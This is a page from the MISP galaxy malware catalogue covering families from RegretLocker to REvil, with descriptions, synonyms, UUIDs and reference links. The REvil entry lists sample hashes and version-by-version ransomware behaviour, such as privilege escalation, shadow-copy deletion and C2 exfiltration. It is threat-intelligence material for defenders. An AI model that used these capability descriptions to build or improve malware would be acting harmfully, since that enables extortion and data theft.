- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf - webarchive
- https://securelist.com/big-threats-using-code-similarity-part-1/97239/ - webarchive
- https://www.youtube.com/watch?v=jeLd-gw2bWo - webarchive
- https://www.epicturla.com/previous-works/hitb2020-voltron-sta - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.kaspersky.com/blog/regin-apt-most-sophisticated/6852/ - webarchive
- https://securelist.com/regin-nation-state-ownage-of-gsm-networks/67741/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RegretLocker
According to PCrisk, RegretLocker is malicious software classified as ransomware. Systems infected with this malware have their data encrypted and users receive ransom demands for decryption. During the encryption process, all affected files are appended with the ".mouse" extension.
Internal MISP references
UUID f89df0d5-2d01-49a2-a2d0-71cdc6a9d64e
which can be used as unique global reference for RegretLocker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker - webarchive
- http://chuongdong.com/reverse%20engineering/2020/11/17/RegretLocker/ - webarchive
- https://twitter.com/malwrhunterteam/status/1321375502179905536 - webarchive
- https://www.bleepingcomputer.com/news/security/new-regretlocker-ransomware-targets-windows-virtual-machines/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RekenSom
Ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RekenSom.
Known Synonyms |
---|
GHack Ransomware |
Internal MISP references
UUID b59a97df-04c5-4e54-a7aa-92452baa7240
which can be used as unique global reference for RekenSom
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
win.rekoobe
A Trojan for Windows with the same code structure and functionality as elf.rekoobe, which targets Linux environments instead.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular win.rekoobe.
Known Synonyms |
---|
tinyshell.win |
tshd.win |
Internal MISP references
UUID e928d9ca-237f-48ab-ab4c-65c04baeb863
which can be used as unique global reference for win.rekoobe
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rekt Loader
Internal MISP references
UUID 431808a0-3671-4072-a9af-9947a54b4b9d
which can be used as unique global reference for Rekt Loader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rektware
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Rektware.
Known Synonyms |
---|
PRZT Ransomware |
Internal MISP references
UUID b40a66c6-c8fa-43c3-8084-87e90f00a8f1
which can be used as unique global reference for Rektware
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RelicRace
Internal MISP references
UUID 9bc81527-97fe-4dd6-87e6-d8ae75e58818
which can be used as unique global reference for RelicRace
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RemCom
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RemCom.
Known Synonyms |
---|
RemoteCommandExecution |
Internal MISP references
UUID 135ce3db-a242-4f81-844a-cf03eb72c291
which can be used as unique global reference for RemCom
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.remcom - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-franklin - webarchive
- https://doublepulsar.com/second-zerologon-attacker-seen-exploiting-internet-honeypot-c7fb074451ef - webarchive
- https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Remcos
Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.
Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Remcos.
Known Synonyms |
---|
RemcosRAT |
Remvio |
Socmer |
Internal MISP references
UUID 2894aee2-e0ec-417a-811e-74a68ab967b2
which can be used as unique global reference for Remcos
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos - webarchive
- https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols - webarchive
- https://securityintelligence.com/x-force/spam-trends-campaigns-senior-superlatives-2023/ - webarchive
- https://perception-point.io/behind-the-attack-remcos-rat/ - webarchive
- https://www.zscaler.com/blogs/security-research/latest-version-amadey-introduces-screen-capturing-and-pushes-remcos-rat - webarchive
- https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf - webarchive
- https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/ - webarchive
- https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html - webarchive
- https://www.vmray.com/cyber-security-blog/smart-memory-dumping/ - webarchive
- https://research.checkpoint.com/2023/unveiling-the-shadows-the-dark-alliance-between-guloader-and-remcos/ - webarchive
- https://medium.com/@amgedwageh/analysis-of-an-autoit-script-that-wraps-a-remcos-rat-6b5b66075b87 - webarchive
- https://www.ciphertechsolutions.com/roboski-global-recovery-automation/ - webarchive
- https://infosecwriteups.com/unfolding-remcos-rat-4-9-2-pro-dfb3cb25bbd1 - webarchive
- https://www.telsy.com/download/4832/ - webarchive
- https://www.esentire.com/blog/remcos-rat - webarchive
- https://dissectingmalwa.re/malicious-ratatouille.html - webarchive
- https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html - webarchive
- https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/ - webarchive
- https://labs.k7computing.com/index.php/unknown-ttps-of-remcos-rat/ - webarchive
- https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine - webarchive
- https://asec.ahnlab.com/ko/32101/ - webarchive
- https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt - webarchive
- https://www.elastic.co/security-labs/dissecting-remcos-rat-part-four - webarchive
- https://cert.gov.ua/article/3931296 - webarchive
- https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/ - webarchive
- https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service - webarchive
- https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/ - webarchive
- https://socprime.com/blog/new-phishing-attack-detection-attributed-to-the-uac-0050-and-uac-0096-groups-spreading-remcos-spyware/ - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage - webarchive
- https://www.youtube.com/watch?v=DIH4SvKuktM - webarchive
- https://securityintelligence.com/posts/roboski-global-recovery-automation/ - webarchive
- https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware - webarchive
- https://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly - webarchive
- https://www.trendmicro.com/en_ca/research/19/h/analysis-new-remcos-rat-arrives-via-phishing-email.html - webarchive
- https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html - webarchive
- https://muha2xmad.github.io/mal-document/remcosdoc/ - webarchive
- https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/ - webarchive
- https://medium.com/@b.magnezi/malware-analysis-ramcos-rat-48fd986328f5 - webarchive
- https://asec.ahnlab.com/en/32376/ - webarchive
- https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html - webarchive
- https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/ - webarchive
- https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2 - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/390/Bitdefender-PR-Whitepaper-Remcos-creat5080-en-EN-GenericUse.pdf - webarchive
- https://intel471.com/blog/privateloader-malware - webarchive
- https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD - webarchive
- https://www.splunk.com/en_us/blog/security/detecting-malware-script-loaders-using-remcos-threat-research-release-december-2021.html - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html - webarchive
- https://www.elastic.co/security-labs/dissecting-remcos-rat-part-three - webarchive
- https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses - webarchive
- https://blog.morphisec.com/nft-malware-new-evasion-abilities - webarchive
- https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ - webarchive
- https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html - webarchive
- https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/ - webarchive
- https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain - webarchive
- https://www.jaiminton.com/reverse-engineering/remcos# - webarchive
- https://gi7w0rm.medium.com/cloudeye-from-lnk-to-shellcode-4b5f1d6d877 - webarchive
- https://www.welivesecurity.com/2021/10/06/moon-hack-fake-safemoon-cryptocurrency-app-drops-malware-spy/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage - webarchive
- https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout - webarchive
- https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/ - webarchive
- https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html - webarchive
- https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/ - webarchive
- https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing - webarchive
- https://blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/ - webarchive
- https://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/ - webarchive
- https://cert.gov.ua/article/3804703 - webarchive
- https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/ - webarchive
- https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf - webarchive
- https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/ - webarchive
- https://cert.gov.ua/article/6276652 - webarchive
- https://www.connectwise.com/resources/formbook-remcos-rat - webarchive
- https://muha2xmad.github.io/unpacking/remcos/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/steganoamor-campaign-ta558-mass-attacking-companies-and-public-institutions-all-around-the-world/ - webarchive
- https://embee-research.ghost.io/decoding-a-remcos-loader-script-visual-basic-deobfuscation/ - webarchive
- https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/ - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf - webarchive
- https://www.elastic.co/security-labs/dissecting-remcos-rat-part-two - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://asec.ahnlab.com/ko/25837/ - webarchive
- https://news.sophos.com/en-us/2020/05/14/raticate/ - webarchive
- https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire - webarchive
- https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update - webarchive
- https://secrary.com/ReversingMalware/RemcosRAT/ - webarchive
- https://www.loginsoft.com/post/blue-screen-mayhem-when-crowdstrikes-glitch-became-threat-actors-playground - webarchive
- https://embeeresearch.io/practical-queries-for-malware-infrastructure-part-3/ - webarchive
- https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf - webarchive
- https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html - webarchive
- http://malware-traffic-analysis.net/2017/12/22/index.html - webarchive
- https://socprime.com/blog/remcos-rat-detection-uac-0050-hackers-launch-phishing-attacks-impersonating-the-security-service-of-ukraine/ - webarchive
- https://www.elastic.co/security-labs/dissecting-remcos-rat-part-one - webarchive
- https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Remcos/Remcos.md - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cyber-attackers-leverage-russia-ukraine-conflict-in-multiple-spam-campaigns - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://embeeresearch.io/decoding-a-remcos-loader-script-visual-basic-deobfuscation/ - webarchive
- https://www.socinvestigation.com/remcos-rat-new-ttps-detection-response/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/ - webarchive
- https://embee-research.ghost.io/practical-queries-for-malware-infrastructure-part-3/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Remexi
Remexi is a highly advanced and stealthy malware discovered in recent times. It employs sophisticated evasion techniques to infiltrate target systems and networks undetected. This malware utilizes various propagation vectors, including exploit kits, social engineering tactics, and compromised websites. Once inside a system, Remexi establishes persistence through rootkit capabilities and leverages command-and-control infrastructure to receive and execute malicious commands. It possesses keylogging and data exfiltration capabilities, enabling it to steal sensitive information such as login credentials and financial data. Additionally, Remexi can download and execute additional payloads, making it adaptable and capable of evolving its malicious activities over time.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Remexi.
Known Synonyms |
---|
CACHEMONEY |
Internal MISP references
UUID d39486af-c056-4bbf-aa1d-86fb5ef90ada
which can be used as unique global reference for Remexi
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions - webarchive
- https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf - webarchive
- https://securelist.com/chafer-used-remexi-malware/89538/ - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-hickman - webarchive
- https://twitter.com/QW5kcmV3/status/1095833216605401088 - webarchive
- https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets - webarchive
- http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf - webarchive
- https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RemoteAdmin
Internal MISP references
UUID 6730a859-f2b9-48f9-8d2b-22944a79c072
which can be used as unique global reference for RemoteAdmin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RemoteControl
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RemoteControl.
Known Synonyms |
---|
remotecontrolclient |
Internal MISP references
UUID 44aae79d-c2f5-47f6-99c1-540c0c5420db
which can be used as unique global reference for RemoteControl
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Remsec
Internal MISP references
UUID 6a3c3fbc-97ec-4938-b64e-2679e4b73db9
which can be used as unique global reference for Remsec
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider - webarchive
- https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-3.html - webarchive
- http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf - webarchive
- https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis.html - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-2.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Remy
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Remy.
Known Synonyms |
---|
WINDSHIELD |
Internal MISP references
UUID b2b93651-cf64-47f5-a54f-799b919c592c
which can be used as unique global reference for Remy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rerdom
Internal MISP references
UUID a1f137d4-298f-4761-935d-bd39ab898479
which can be used as unique global reference for Rerdom
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Reshell
Internal MISP references
UUID 37333fe3-0b6a-4b3b-9f2f-90d29ee5419a
which can be used as unique global reference for Reshell
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Resident
According to Cisco Talos, Resident is a backdoor likely developed by the same author as win.warmcookie, and it was observed being delivered in intrusions they attribute to TA866.
Internal MISP references
UUID 91435d91-0985-483b-bffb-9762b9cb0287
which can be used as unique global reference for Resident
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Retadup
Internal MISP references
UUID 42fa55e3-e708-4c11-b807-f31573639941
which can be used as unique global reference for Retadup
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/ - webarchive
- https://decoded.avast.io/janvojtesek/putting-an-end-to-retadup-a-malicious-worm-that-infected-hundreds-of-thousands/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Retefe (Windows)
Retefe is a Windows banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. Its primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a JavaScript file, which builds a VBA file, which in turn loads multiple tools onto the host, including 7zip and TOR. The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker-controlled host in order to effectively MITM TLS traffic.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Retefe (Windows).
Known Synonyms |
---|
Tsukuba |
Werdlod |
Internal MISP references
UUID 96bf1b6d-28e1-4dd9-aabe-23050138bc39
which can be used as unique global reference for Retefe (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe - webarchive
- https://vulnerability.ch/2019/05/analysing-retefe-with-sysmon-and-splunk/ - webarchive
- https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/ - webarchive
- https://github.com/cocaman/retefe - webarchive
- https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe - webarchive
- https://github.com/Tomasuh/retefe-unpacker - webarchive
- https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/ - webarchive
- https://www.govcert.admin.ch/blog/35/reversing-retefe - webarchive
- https://www.govcert.admin.ch/blog/33/the-retefe-saga - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Retro
Internal MISP references
UUID a4dc538e-09b7-4dba-99b0-e8b8b70dd42a
which can be used as unique global reference for Retro
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.retro - webarchive
- https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html - webarchive
- https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf - webarchive
- https://blog.360totalsecurity.com/en/analysis-cve-2018-8174-vbscript-0day-apt-actor-related-office-targeted-attack/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Revenant
According to its author, Revenant is a 3rd party agent for Havoc written in C, and based on Talon. This implant is meant to expand on the Talon implant by implementing covert methods of execution, robust capabilities, and more customization.
Internal MISP references
UUID c95db5a7-8405-4931-868f-1a33ea7e8f6b
which can be used as unique global reference for Revenant
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Revenge RAT
According to Cofense, Revenge RAT is a simple and freely available Remote Access Trojan that automatically gathers system information before allowing threat actors to remotely access system components such as webcams, microphones, and various other utilities.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Revenge RAT.
Known Synonyms |
---|
Revetrat |
Internal MISP references
UUID 75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f
which can be used as unique global reference for Revenge RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat - webarchive
- https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html - webarchive
- https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/ - webarchive
- https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/ - webarchive
- https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g - webarchive
- https://github.com/itaymigdal/malware-analysis-writeups/blob/main/RevengeRAT/RevengeRAT.md - webarchive
- https://blogs.360.cn/post/APT-C-44.html - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel - webarchive
- https://yoroi.company/research/the-evolution-of-aggah-from-roma225-to-the-rg-campaign/ - webarchive
- https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated - webarchive
- https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/ - webarchive
- https://perception-point.io/revenge-rat-back-from-microsoft-excel-macros/ - webarchive
- https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html - webarchive
- https://isc.sans.edu/diary/rss/22590 - webarchive
- https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns - webarchive
- https://blog.reversinglabs.com/blog/rats-in-the-library - webarchive
- https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries - webarchive
- https://embee-research.ghost.io/introduction-to-dotnet-configuration-extraction-revengerat/ - webarchive
- https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/ - webarchive
- https://blog.reversinglabs.com/blog/dotnet-loaders - webarchive
- https://securelist.com/revengehotels/95229/ - webarchive
- https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader - webarchive
- https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ReverseRAT
Internal MISP references
UUID c3b6a9f9-afef-4249-ab59-afc5b2efc0b3
which can be used as unique global reference for ReverseRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.reverse_rat - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf - webarchive
- https://blog.lumen.com/reverserat-reemerges-with-a-nightfury-new-campaign-and-new-developments-same-familiar-side-actor/ - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388 - webarchive
- https://blog.lumen.com/suspected-pakistani-actor-compromises-indian-power-company-with-new-reverserat/ - webarchive
- https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/ - webarchive
- https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf - webarchive
- https://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Reveton
Ransomware.
Internal MISP references
UUID 48c10822-9af8-4324-9516-b33ecf975590
which can be used as unique global reference for Reveton
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
REvil (Windows)
REvil Beta
MD5: bed6fc04aeb785815744706239a1f243
SHA1: 3d0649b5f76dbbff9f86b926afbd18ae028946bf
SHA256: 3641b09bf6eae22579d4fd5aae420476a134f5948966944189a70afd8032cb45
- Privilege escalation via CVE-2018-8453 (64-bit only)
- Reruns itself with RunAs to elevate privileges
- Implements a requirement that, if "exp" is set, privilege escalation must succeed for full execution to occur
- Implements target whitelisting using GetKeyboardLayoutList
- Contains debug console logging functionality
- Defines the REvil registry root key as SOFTWARE!test
- Includes two variable placeholders in the ransom note: UID and KEY
- Terminates processes specified in the "prc" configuration key prior to encryption
- Deletes shadow copies and disables recovery
- Wipes the contents of folders specified in the "wfld" configuration key prior to encryption
- Encrypts all non-whitelisted files on fixed drives
- Encrypts all non-whitelisted files on network mapped drives if it is running with System-level privileges or can impersonate the security context of explorer.exe
- Partially implements a background image setting to display a basic "Image text" message
- Sends encrypted system data to a C2 domain via an HTTPS POST request (URI path building is not implemented)
REvil 1.00
MD5: 65aa793c000762174b2f86077bdafaea
SHA1: 95a21e764ad0c98ea3d034d293aee5511e7c8457
SHA256: f0c60f62ef9ffc044d0b4aeb8cc26b971236f24a2611cb1be09ff4845c3841bc
- Adds a 32-bit implementation of the CVE-2018-8453 exploit
- Removes console debug logging
- Changes the REvil registry root key to SOFTWARE\recfg
- Removes the System/impersonation requirement for encrypting network mapped drives
- Adds a "wipe" key to the configuration for optional folder wiping
- Fully implements the background image setting and uses the values defined in the "img" configuration key
- Adds an EXT variable placeholder to the ransom note, so it now supports UID, KEY and EXT
- Implements URI path building so encrypted system data is sent to a pseudo-random C2 URL
- Fixes the function that returns the victim's username so the correct value is placed in the stats JSON data
REvil 1.01
MD5: 2abff29b4d87f30f011874b6e98959e9
SHA1: 9d1b61b1cba411ee6d4664ba2561fa59cdb0732c
SHA256: a88e2857a2f3922b44247316642f08ba8665185297e3cd958bbd22a83f380feb
- Removes the exp/privilege escalation requirement for full execution and encrypts data regardless of privilege level
- Makes encryption of network mapped drives optional by adding the "-nolan" argument
REvil 1.02
MD5: 4af953b20f3a1f165e7cf31d6156c035
SHA1: b859de5ffcb90e4ca8e304d81a4f81e8785bb299
SHA256: 89d80016ff4c6600e8dd8cfad1fa6912af4d21c5457b4e9866d1796939b48dc4
- Enhances whitelisting validation by also inspecting GetUserDefaultUILanguage and GetSystemDefaultUILanguage
- Partially implements "lock file" logic: generates a lock filename from the first four bytes of the Base64-decoded pk key, appends a .lock extension, and adds the filename to the list of whitelisted files in the REvil configuration (the value does not appear to be referenced after it is created and stored in memory, and there is no evidence that a lock file is dropped to disk)
- Enhances folder whitelisting logic with special handling for folders under the "program files" directories:
  - Hard-codes whitelisting of all direct content within the Program Files or Program Files x86 directories
  - Hard-codes whitelisting of "sql" subfolders within program files
  - Encrypts program files sub-folders that do not contain "sql" in the path
  - Compares other folders to the list of whitelisted folders specified in the REvil configuration to determine whether they are whitelisted
- Encodes the stored strings used for URI building within the binary and decodes them in memory right before use
- Introduces a "sub_key" registry value under the REvil registry root key containing the attacker's public key
REvil 1.03
MD5: 3cae02306a95564b1fff4ea45a7dfc00
SHA1: 0ce2cae5287a64138d273007b34933362901783d
SHA256: 78fa32f179224c46ae81252c841e75ee4e80b57e6b026d0a05bb07d34ec37bbf
- Removes the lock file logic that was partially implemented in 1.02
- Uses WMI to continuously monitor for and kill newly launched processes whose names are listed in the prc configuration key (previous versions performed this action once)
